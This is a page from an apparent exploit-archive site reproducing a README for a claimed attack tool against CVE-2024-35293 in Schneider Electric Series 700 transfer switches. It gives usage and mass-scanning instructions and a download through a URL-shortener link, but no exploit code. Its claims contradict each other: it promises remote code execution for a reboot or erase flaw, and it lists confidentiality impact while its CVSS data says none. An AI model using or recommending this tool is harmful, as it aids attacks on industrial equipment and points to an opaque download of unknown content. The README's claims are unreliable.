Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-35293 PoC — Schneider Electric Series 700 访问控制错误漏洞

Source
Associated Vulnerability
Title:Schneider Electric Series 700 访问控制错误漏洞 (CVE-2024-35293)
Description:Schneider Electric Series 700是法国施耐德电气(Schneider Electric)公司的一系列电源转换开关。 Schneider Electric Series 700 0.1.17.6及之前版本存在访问控制错误漏洞,该漏洞源于未经身份验证的远程攻击者可能会利用关键功能漏洞的身份验证缺失来重新启动或清除受影响的设备,从而导致数据丢失或拒绝服务攻击。
Readme
## 🌟 Description
CVE-2024-35293
This vulnerability makes it possible for unauthenticated remote attacker may use a missing authentication for critical function vulnerability to reboot or erase the affected devices resulting in data loss and/or a DoS.

## Details

- **CVE ID**: [CVE-2024-35293](https://nvd.nist.gov/vuln/detail/CVE-2024-35293)
- **Discovered**: 2024-10-1
- **Published**: 2024-10-2
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/xyDub)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-35293
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-35293.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 📈 CVSS Information
Score: 9.1

Severity: CRITICAL

Confidentiality: None

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low
File Snapshot

[4.0K] /data/pocs/8cee474f975be5106170026d8d81aa137103505c └── [1.9K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.